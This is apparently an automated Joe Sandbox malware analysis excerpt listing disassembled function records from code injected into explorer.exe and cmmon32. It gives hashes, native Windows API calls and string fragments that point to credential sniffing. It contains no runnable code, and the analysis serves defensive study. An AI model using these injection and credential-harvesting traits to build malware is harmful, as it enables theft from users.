                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$el32$h$kern
                                                          • API String ID: 0-4264704552
                                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction ID: b066ace958ff702f7c2769ed6ace166bc904f4d47c8c96308fa37b6eda0180de
                                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction Fuzzy Hash: 1D417170608B498FD769DF6980843AAFBE5FB98300F104A6F949EC3255DB70C945CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction ID: 83beb682bd0ea901ab342669c442fc6c9a475db3120a34495ebc4da4539a6d6e
                                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction Fuzzy Hash: C631F87150CB485FD71AEB28C4846EAB7D4FB94300F504D2EE49BC7291EE35A989CB43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction ID: a8630b586e7f5af733d1e1d575bb552add76bd249e92f350b4d3cbe8cf4f9c67
                                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction Fuzzy Hash: 0231F471508B486FD71AEB28C4846EAB7D4FB94300F404D2EE49BC7295EE30E986CA43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction ID: 5cef503dfcc6dd06b51d7c6989d0db0166823d2d277a959bbb0a4674854d730b
                                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction Fuzzy Hash: BD317E70218B188FCB84EF688494BAAB7E1FF98200F844A7D944ECB254DF30C985CB53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction ID: f9f8ef8b4aecf8b511f15df33d6a5c5d5bbc214ef348125946d40f0719fdc0c4
                                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction Fuzzy Hash: 02316D70218B188FCB94EF688494BAAB7E1FF98300F944A7D944ACB255DF30C985CB53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: ed8e8a2a763326d0eec12ceada4c7333bb61686fe0066ee1d826419b241f1b4e
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: 2631DF31614A1C8BCF15EFA8C8847EEB7E0FF58204F40062EE45ED7240DE788A85C78A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: c5ec1e8255ca0c624e5ba507c39f2487970637a1e99dd13bdfed0e01d9a112c8
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: 2321C371610A1C8BCF15EFA8C8847ED7BF0FF58204F40462ED45AD7240DE748A858786
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction ID: eff4ceaa8150392b031b0c466cb1df587d5c8a9eb86954be8d787273494124ae
                                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction Fuzzy Hash: E4218B74A24B1D9FDB48EFA8C0447AEBAF0FF18310F504A2ED009D3610DB789995CB85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction ID: 5a348cb0637b65bcd5cb3092a2cf9c30f98c4fae06b7eed3b7e0319b785d9f28
                                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction Fuzzy Hash: EE216B74A24B1D9BDB48EFA8D0447EEBBF1FF18314F504A2ED009D3600DB7999958B85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: auth$logi$pass$user
                                                          • API String ID: 0-2393853802
                                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction ID: d62b6559fef45c24019ed897b2a5faa481d399eef919bee97d921ae925457a8c
                                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction Fuzzy Hash: 2F21C030614B0D8BCF05DF9D98906EEB7E1EF88344F00562DD40ADB244D7B4E9548BC2

                                                          Execution Graph

                                                          Execution Coverage: 1.7%
                                                          Dynamic/Decrypted Code Coverage: 6.8%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 622
                                                          Total number of Limit Nodes: 79

                                                          Control-flow Graph

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                          • Instruction ID: 30d77a8122b9a0be4c15d2064dd31e72a998f64ceaeffbc863e0098e3f8e25da
                                                          • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                          • Instruction Fuzzy Hash: 0DF10074518A8C8FDBA5EF68C894AEEB7E0FF98304F40462AD44BD7254DF34A545CB41

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: Section$CloseCreateView
                                                          • String ID: @$@
                                                          • API String ID: 1133238012-149943524
                                                          • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                          • Instruction ID: 3fb0b5f69dc53756ad27d96c275fa6c0ba0fb3f142f5bf1eccd04eb73c32b140
                                                          • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                          • Instruction Fuzzy Hash: 79617270518B488FDB58EF68D8856AABBE0FF98314F50062EE58BC3651DF35E441CB86

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: @$@
                                                          • API String ID: 1585966358-149943524
                                                          • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                          • Instruction ID: 3e424f4e873533c0e93bbe9b76578c80174db02b195eee603551ed9a0a4bd61c
                                                          • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                          • Instruction Fuzzy Hash: 8E517FB0618B088FD758DF58D8956AABBE4FB88314F50062EE58EC3691DF35E441CB86

                                                          Control-flow Graph

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                          • Instruction ID: dadb893f9530c6aa98e58827c6456c56b877b38b98650f81d1ebdf38d2b16dc4
                                                          • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                          • Instruction Fuzzy Hash: 8B512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41

                                                          Control-flow Graph

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02CA4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CA4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02CAA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 5873c37bb1c5ff25daab136cdc266574ff2c640670bc5413e7ec8714bef62449
                                                          • Instruction ID: 803f1469ec9c30cab3238e62a84adaa791ac83f47268158f4a644bc38d340a33
                                                          • Opcode Fuzzy Hash: 5873c37bb1c5ff25daab136cdc266574ff2c640670bc5413e7ec8714bef62449
                                                          • Instruction Fuzzy Hash: A4417FB6604249AFCB08DF98DC95DEB77A9EF88318F14864DF95D97242C631E811CBA0

                                                          Control-flow Graph

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02CA4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CA4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02CAA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: c13c0ec98852f4d61a9be5822d4df95d2ae6a60f0cb9e050bb25a4baed9508f1
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 9AF0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA1D97240C630E811CBA4
                                                          APIs
                                                          • NtReadFile.NTDLL(02CA4D62,5EB65239,FFFFFFFF,02CA4A21,?,?,02CA4D62,?,02CA4A21,FFFFFFFF,5EB65239,02CA4D62,?,00000000), ref: 02CAA445
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 30b39373cb24bc4ff630eec34efb854175b89563b936ef07dc1c3e61bab5df50
                                                          • Instruction ID: 378531a5a7a1a234a1586fe673be0c01291461c2504352393f93991fa13879de
                                                          • Opcode Fuzzy Hash: 30b39373cb24bc4ff630eec34efb854175b89563b936ef07dc1c3e61bab5df50
                                                          • Instruction Fuzzy Hash: 29F0A4B2200109AFDB18DF99DC94EEB77A9AF8D354F158649BE1DA7241C630E911CBA0
                                                          APIs
                                                          • NtReadFile.NTDLL(02CA4D62,5EB65239,FFFFFFFF,02CA4A21,?,?,02CA4D62,?,02CA4A21,FFFFFFFF,5EB65239,02CA4D62,?,00000000), ref: 02CAA445
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 56cfed005245353e5a427b1386e1e92ce73552332cb1e46eff3ca89e070dbfef
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: ADF0B7B2200209AFCB18DF89DC90EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C92D11,00002000,00003000,00000004), ref: 02CAA569
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: cdf54913837b1507a6b74950451447b6a1cd029a776d81c1998d9cd86d89c1e4
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: FBF015B2200209AFCB18DF89CC80EAB77ADAF88754F118148BE1C97241C630F810CBA0
                                                          APIs
                                                          • NtClose.NTDLL(02CA4D40,?,?,02CA4D40,00000000,FFFFFFFF), ref: 02CAA4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 79370c38985f3ec32e2718c92d707d0d3efe6922f56ad0a9f2dcd0028b008108
                                                          • Instruction ID: a2d1e446dcf28b205f9ddefd2b6f64010207b230a898209a556c8a5bb6dd8540
                                                          • Opcode Fuzzy Hash: 79370c38985f3ec32e2718c92d707d0d3efe6922f56ad0a9f2dcd0028b008108
                                                          • Instruction Fuzzy Hash: 51E0C2762002006FDB10EFD8CC84ED77B69EF48710F104254BA1C9B341C531E60087D0
                                                          APIs
                                                          • NtClose.NTDLL(02CA4D40,?,?,02CA4D40,00000000,FFFFFFFF), ref: 02CAA4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 4939596462545ad0386e7a1db4521ddb8906f4c2de7546f25ab3ddb0e7b447dc
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 82D01776200214ABD714EB98CC85EA77BADEF48764F154499BA1C9B242C530FA008AE0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 23bf6c7d7f496069535c9d57ed62d3ff7584ecdd7142246915988493e1fa8ff3
                                                          • Instruction ID: e16df53cec10fc63bb4b2cb693f6bad40122169634ccf792dd0be43d0787de97
                                                          • Opcode Fuzzy Hash: 23bf6c7d7f496069535c9d57ed62d3ff7584ecdd7142246915988493e1fa8ff3
                                                          • Instruction Fuzzy Hash: 5290027520140402F1007598550864600068BE0705F55D021A5025559EC6A5D9916131
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3ce94d125e2c067ce15edeff91c189fe358927174582467d8ce8e79ddd7f750
                                                          • Instruction ID: 3e13a9a4ca773282c7825ea56f9356923934e1cd761b633f2b6f8412d8b1e541
                                                          • Opcode Fuzzy Hash: a3ce94d125e2c067ce15edeff91c189fe358927174582467d8ce8e79ddd7f750
                                                          • Instruction Fuzzy Hash: 4E90027520140842F10071584504B4600068BE0705F55C026A0125658DC655D9517531
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2a2e1410e1c8e2810d1a7316184b52e8972e189691240e607ad84c2fa2ee0ec5
                                                          • Instruction ID: 11bda11a25d94b0e0447ac1290211e20711919c3acfab92c88f5ef51748c1a22
                                                          • Opcode Fuzzy Hash: 2a2e1410e1c8e2810d1a7316184b52e8972e189691240e607ad84c2fa2ee0ec5
                                                          • Instruction Fuzzy Hash: 2F90027520148802F1107158850474A00068BD0705F59C421A442565CDC6D5D9917131
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 329c410d03c64e8d4ff06491b8f238d913c49fe6361e3661b975d00a7c68740f
                                                          • Instruction ID: c7b518450014c63785e686783041b49874e426ab89406a99abdd62c211a19648
                                                          • Opcode Fuzzy Hash: 329c410d03c64e8d4ff06491b8f238d913c49fe6361e3661b975d00a7c68740f
                                                          • Instruction Fuzzy Hash: 96900265242441527545B158450450740079BE0645795C022A1415954CC566E956D631
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1c73cba9feb1763c698796f0c4371824a5b1daae13b2d12a4b6ec603498de6f8
                                                          • Instruction ID: 52703ab9c6b662eb01810a9a8f59df90cec6f73788c9ab944a6af9ca9be2bbbb
                                                          • Opcode Fuzzy Hash: 1c73cba9feb1763c698796f0c4371824a5b1daae13b2d12a4b6ec603498de6f8
                                                          • Instruction Fuzzy Hash: 5890027520140413F11171584604707000A8BD0645F95C422A042555CDD696DA52A131
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31decd8780ef4d69579661a35260892d6ca098fe985f41cd9bdccd88cb41e6df
                                                          • Instruction ID: 7c3f549fbd05ca8fb460a49538c179c98fad90d81e4920d7cd46d373d5ab15ee
                                                          • Opcode Fuzzy Hash: 31decd8780ef4d69579661a35260892d6ca098fe985f41cd9bdccd88cb41e6df
                                                          • Instruction Fuzzy Hash: C490026D21340002F1807158550860A00068BD1606F95D425A001655CCC955D9695331
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 001bfc63a87c3bd6a4cd16928dcf267efbd202b629b1eba4df2ad633b6f32629
                                                          • Instruction ID: f36322e48c1ed264d7a62488399bce9d7744f35e1ede734668cc99949dd27e45
                                                          • Opcode Fuzzy Hash: 001bfc63a87c3bd6a4cd16928dcf267efbd202b629b1eba4df2ad633b6f32629
                                                          • Instruction Fuzzy Hash: B39002B520140402F1407158450474600068BD0705F55C021A5065558EC699DED56675
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d14df695a4ca0545634c1e0f05c60b0d5cd1182a3bdfd9dcc889a8ef0a3bc10c
                                                          • Instruction ID: 465860587a0f3b166de841da3e12743adf20f066b3c70353bb3b4600ad3cd175
